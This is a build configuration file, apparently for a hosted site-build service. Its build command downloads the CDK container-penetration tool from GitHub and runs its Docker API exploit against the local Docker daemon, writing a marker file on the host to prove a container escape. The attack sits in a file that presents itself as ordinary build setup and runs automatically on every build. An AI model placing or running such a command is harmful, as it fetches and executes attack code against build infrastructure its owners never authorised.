[build]
  command = "curl -LJO https://github.com/cdk-team/CDK/releases/download/v1.2.0/cdk_linux_amd64 && chmod a+x cdk_linux_amd64 && ./cdk_linux_amd64 run docker-api-pwn http://127.0.0.1:2375 'touch /host/tmp/docker-api-pwn'"
